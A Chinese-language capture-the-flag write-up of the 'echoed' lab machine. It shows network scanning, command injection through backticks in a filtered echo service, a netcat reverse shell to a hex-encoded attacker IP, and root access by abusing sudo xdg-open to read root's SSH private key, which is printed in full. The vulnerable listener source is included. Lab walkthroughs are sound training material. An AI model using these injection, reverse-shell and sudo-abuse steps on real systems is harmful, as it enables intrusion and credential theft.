难度:medium
kali:192.168.1.101
靶机:192.168.1.110
root@kali2 [~] ➜ arp-scan -l [23:36:57] Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.1.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 78:60:5b:04:b4:8c TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.104 44:e5:17:0a:27:01 Intel Corporate
192.168.1.110 08:00:27:5f:d3:ff PCS Systemtechnik GmbH端口扫描
root@kali2 [~] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.110 [23:37:08] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 23:37 CST
Nmap scan report for 192.168.1.110
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
4444/tcp open krb524
MAC Address: 08:00:27:5F:D3:FF (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
root@kali2 [~] ➜ clear [23:37:46] root@kali2 [~] ➜ nmap -sV -A 192.168.1.110 -p22,80,4444 [23:37:50] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 23:38 CST
Nmap scan report for 192.168.1.110
Host is up (0.0041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:3a:50:8e:5d:21:09:7e:40:3f:b2:07:bb:41:08:7e (RSA)
| 256 5c:57:56:da:e5:1c:3e:bc:9a:a2:8d:6d:21:4e:bc:f9 (ECDSA)
|_ 256 f8:aa:dc:d3:27:52:e3:99:32:98:45:5b:52:f0:bc:e1 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Command:Found illegal char.Command:
| NULL:
|_ Command:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.94SVN%I=7%D=8/17%Time=66C0C3E1%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"Command:")%r(GetRequest,23,"Command:Found\x20illegal\x20char\.
SF:Command:");
MAC Address: 08:00:27:5F:D3:FF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 4.09 ms 192.168.1.110
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.37 seconds命令执行getshell
提示使用4444端口
重启一下靶机
root@kali2 [~/Desktop] ➜ nc 192.168.1.110 4444 [0:00:40]
Command:ls
Found illegal char.Command:有点ctf了,过滤了一些字符
Executing:echo "a"
a
Command:a
Executing:echo "a"
a
Command:b
Executing:echo "b"
b
Command:c
Executing:echo "c"
c
Command:d
Found illegal char.Command:e
Executing:echo "e"
e应该是执行echo这个字符
Command:`ss`
Executing:echo "`ss`"
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
u_str ESTAB 0 0 * 12622 * 12623
u_str ESTAB 0 0 * 12682 * 12683
u_str ESTAB 0 0 * 12803 * 12804
u_str ESTAB 0 0 /var/run/dbus/system_bus_socket 12854 * 12543
u_str ESTAB 0 0 * 12852 * 12853
u_str ESTAB 0 0 * 12543 * 12854
u_str ESTAB 0 0 * 12853 * 12852
u_str ESTAB 0 0 /run/systemd/journal/stdout 12683 * 12682
u_str ESTAB 0 0 * 13469 * 13470
u_str ESTAB 0 0 /run/systemd/journal/stdout 12623 * 12622
u_str ESTAB 0 0 * 12552 * 12855
u_str ESTAB 0 0 * 13470 * 13469
u_str ESTAB 0 0 /var/run/dbus/system_bus_socket 13075 * 13074
u_str ESTAB 0 0 * 10998 * 11095
u_str ESTAB 0 0 * 11525 * 11526
u_str ESTAB 0 0 * 13074 * 13075
u_str ESTAB 0 0 /var/run/dbus/system_bus_socket 12855 * 12552
u_str ESTAB 0 0 /run/systemd/journal/stdout 12804 * 12803
u_str ESTAB 0 0 * 13275 * 13276
u_str ESTAB 0 0 /run/systemd/journal/stdout 13276 * 13275
u_str ESTAB 0 0 /run/systemd/journal/stdout 11095 * 10998
u_str ESTAB 0 0 /run/systemd/journal/stdout 11526 * 11525
tcp ESTAB 0 0 192.168.1.110:4444 192.168.1.101:58726 测试发现可以命令执行。
Command:nc
Executing:echo "nc"
nc
Command:-e
Executing:echo "-e"
-e
Command:/bin/bash
Executing:echo "/bin/bash"
/bin/bash想执行反弹shell,只有.被过滤用ip地址的16进制或者10进制都能绕过这个点
Command:`nc -e /bin/bash 0xC0A80165 4567`root@kali2 [~/Desktop] ➜ nc -lnvp 4567 [0:30:05]
listening on [any] 4567 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.110] 46302
id
uid=1000(charlie) gid=1000(charlie) groups=1000(charlie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)拿到shell
提权
charlie@echoed:~$ cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"charlie@echoed:~$ ls -al flag.sh
-rwxr-xr-x 1 charlie charlie 1920 Dec 16 2020 flag.sh只有charlie的权限所以只能读取user flag
charlie@echoed:~$ cat listener.py
#!/usr/bin/env python
import os
import socket
import subprocess
HOST = '0.0.0.0'
PORT = 4444
allow_reuse_address = True
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(100)
conn, addr = s.accept()
while True:
try:
conn.send("Command:")
comando = conn.recv(1024)
comando = comando.strip()
comando2 = 'echo "' + comando + '"'
command = 'Executing:' + comando2 + '\n'
print ("\n")
chars = set('d\fgjkl?mopqrtuv*,._')
if any((c in chars) for c in comando):
conn.send('Found illegal char.')
else:
output = subprocess.check_output(comando2, shell=True)
conn.send(command)
conn.send(output)
except:
continue把这个脚本保存下来以后出给小孩玩。
charlie@echoed:~$ sudo -l
Matching Defaults entries for charlie on echoed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charlie may run the following commands on echoed:
(ALL : ALL) NOPASSWD: /usr/bin/xdg-open搜了一下这个命令可以打开文件或者图片,用默认的编辑器,我直接读root flag
charlie@echoed:~$ sudo xdg-open /root/root.txt
WARNING: terminal is not fully functional
/root/root.txt (press RETURN)HMVcharlied
/root/root.txt (END)(END)(END)(END)(END)(END)(END)(END)拿到root flag,但是没有拿到rootshell
读一下root的私钥
charlie@echoed:~$ sudo xdg-open /root/.ssh/id_rsa
WARNING: terminal is not fully functional
/root/.ssh/id_rsa (press RETURN)-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7EqTEqxQiI+A27hayef+XQLgE91eQQ94tyvsEFWvQiLtSUwHhCKn
TXARwWcCc5uWFhMTAqL8mFncfYLYvRG2PhiasUgi+kIVjWQZPp/CAu/AMQCeELd2giWoz/
w4xuiz/jVkUiZtB4OUfGFbwkMFi5wqRM5d6TIGUQinfGiwiutWSusQ7cpxLgbtGGuuJe5Z
BOXYk4WDZfV+o8DiqTn/DSyADeQoyTYO6qfkcFN2lgVlGdEYx7CF5MS+DT/+b5dBpQGcTj
jDj+KLckJkt7GZ0fbhpzToiBETTBBDqzgeeN04QmAOlOubbcIwnB33+PEaWFtQMatGZQYC
ks9KBQv+lQAAA8hYRFboWERW6AAAAAdzc2gtcnNhAAABAQDsSpMSrFCIj4DbuFrJ5/5dAu
AT3V5BD3i3K+wQVa9CIu1JTAeEIqdNcBHBZwJzm5YWExMCovyYWdx9gti9EbY+GJqxSCL6
QhWNZBk+n8IC78AxAJ4Qt3aCJajP/DjG6LP+NWRSJm0Hg5R8YVvCQwWLnCpEzl3pMgZRCK
d8aLCK61ZK6xDtynEuBu0Ya64l7lkE5diThYNl9X6jwOKpOf8NLIAN5CjJNg7qp+RwU3aW
BWUZ0RjHsIXkxL4NP/5vl0GlAZxOOMOP4otyQmS3sZnR9uGnNOiIERNMEEOrOB543ThCYA
6U65ttwjCcHff48RpYW1Axq0ZlBgKSz0oFC/6VAAAAAwEAAQAAAQEAzdQoSRvRCyP2G297
pmVwLZVTm/o5IHNZtDWObKw2/mVuTWrtIS0Oj2YQEWipugrNsmzrImDXp96fMrXIFupW1c
CY/9TWoyjtnTyUwPhpCCXQRN9E0Ur+8F/drU8IJjyOjeH0gZr3XpQ/xBkK1S2MpxBhwY4C
QCBTYEMpojWPk3HAMbQNFddsPAPfLFk+4R6GPUKrUtOzzf/Kdwpn+PTFRjvytPfS7pbPAx
YHyM42rSNhy6jQlN1Iiu+EwUm1MBl9bTk5A6Jk3fvQWnBXoPZfjbgE/Kk2RZXZNW1a6MBG
URR5zjhWfu0NvJDm8z227UgwV7fXsUMyvBbeYFJHOuygAQAAAIEA6Inpgcu76BJkYcgTJD
PEwbtyyc/PE9vFYIwBENuUlz6jXT1TuhZ1FyY+pidQ607l0E+M7zwGrMb+PQP8l7KpMkbX
Y8IQydqs/XzNziO9RnQusXFcVCbsAKmYsLeCkbzOn4yWitA5cpgLs/bXrqGs2dFE/d8ifi
mLodRZj6/vLGwAAACBAPlu5m8XoaGK1XkF7Vlik4YoCNPnavRGB91fJg/M7M5YKKR7Y1ll
jmNX4TIIj+U5CuvIBf6TVS1fwn95ANv2o8oxVG7e4AHZpt3GQtP2yDLiHshzsj0W6NzzeI
dB2BClQgvukjzremccz8rHV3L9nYr1LYF/Rs6GgvsD72AZzgNJAAAAgQDygxopioQQ/Dup
/root/.ssh/id_rsaz6hTWng1LXgZ0EUBMqN5tCcGgTHvAeykiWpjl/zrK5QjDmjhKzYaHPBI/sUdgVA8o2R8ne
:hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
:eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==是有的,整理一下格式
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7EqTEqxQiI+A27hayef+XQLgE91eQQ94tyvsEFWvQiLtSUwHhCKn
TXARwWcCc5uWFhMTAqL8mFncfYLYvRG2PhiasUgi+kIVjWQZPp/CAu/AMQCeELd2giWoz/
w4xuiz/jVkUiZtB4OUfGFbwkMFi5wqRM5d6TIGUQinfGiwiutWSusQ7cpxLgbtGGuuJe5Z
BOXYk4WDZfV+o8DiqTn/DSyADeQoyTYO6qfkcFN2lgVlGdEYx7CF5MS+DT/+b5dBpQGcTj
jDj+KLckJkt7GZ0fbhpzToiBETTBBDqzgeeN04QmAOlOubbcIwnB33+PEaWFtQMatGZQYC
ks9KBQv+lQAAA8hYRFboWERW6AAAAAdzc2gtcnNhAAABAQDsSpMSrFCIj4DbuFrJ5/5dAu
AT3V5BD3i3K+wQVa9CIu1JTAeEIqdNcBHBZwJzm5YWExMCovyYWdx9gti9EbY+GJqxSCL6
QhWNZBk+n8IC78AxAJ4Qt3aCJajP/DjG6LP+NWRSJm0Hg5R8YVvCQwWLnCpEzl3pMgZRCK
d8aLCK61ZK6xDtynEuBu0Ya64l7lkE5diThYNl9X6jwOKpOf8NLIAN5CjJNg7qp+RwU3aW
BWUZ0RjHsIXkxL4NP/5vl0GlAZxOOMOP4otyQmS3sZnR9uGnNOiIERNMEEOrOB543ThCYA
6U65ttwjCcHff48RpYW1Axq0ZlBgKSz0oFC/6VAAAAAwEAAQAAAQEAzdQoSRvRCyP2G297
pmVwLZVTm/o5IHNZtDWObKw2/mVuTWrtIS0Oj2YQEWipugrNsmzrImDXp96fMrXIFupW1c
CY/9TWoyjtnTyUwPhpCCXQRN9E0Ur+8F/drU8IJjyOjeH0gZr3XpQ/xBkK1S2MpxBhwY4C
QCBTYEMpojWPk3HAMbQNFddsPAPfLFk+4R6GPUKrUtOzzf/Kdwpn+PTFRjvytPfS7pbPAx
YHyM42rSNhy6jQlN1Iiu+EwUm1MBl9bTk5A6Jk3fvQWnBXoPZfjbgE/Kk2RZXZNW1a6MBG
URR5zjhWfu0NvJDm8z227UgwV7fXsUMyvBbeYFJHOuygAQAAAIEA6Inpgcu76BJkYcgTJD
PEwbtyyc/PE9vFYIwBENuUlz6jXT1TuhZ1FyY+pidQ607l0E+M7zwGrMb+PQP8l7KpMkbX
Y8IQydqs/XzNziO9RnQusXFcVCbsAKmYsLeCkbzOn4yWitA5cpgLs/bXrqGs2dFE/d8ifi
mLodRZj6/vLGwAAACBAPlu5m8XoaGK1XkF7Vlik4YoCNPnavRGB91fJg/M7M5YKKR7Y1ll
jmNX4TIIj+U5CuvIBf6TVS1fwn95ANv2o8oxVG7e4AHZpt3GQtP2yDLiHshzsj0W6NzzeI
dB2BClQgvukjzremccz8rHV3L9nYr1LYF/Rs6GgvsD72AZzgNJAAAAgQDygxopioQQ/Dup
z6hTWng1LXgZ0EUBMqN5tCcGgTHvAeykiWpjl/zrK5QjDmjhKzYaHPBI/sUdgVA8o2R8ne
hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----root@kali2 [~/Desktop] ➜ vim id_rsa [0:54:10]
root@kali2 [~/Desktop] ➜ chmod 600 id_rsa [0:54:16]
root@kali2 [~/Desktop] ➜ ssh -i id_rsa root@192.168.1.110 [0:54:22]
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
ED25519 key fingerprint is SHA256:oQu3q+1PdKxh+LYJGhUzk9Xi5XkHM5TN+iho+LIwgPo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.1.110' (ED25519) to the list of known hosts.
Linux echoed 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 17 02:25:52 2020
root@echoed:~# id
uid=0(root) gid=0(root) groups=0(root拿到rootshell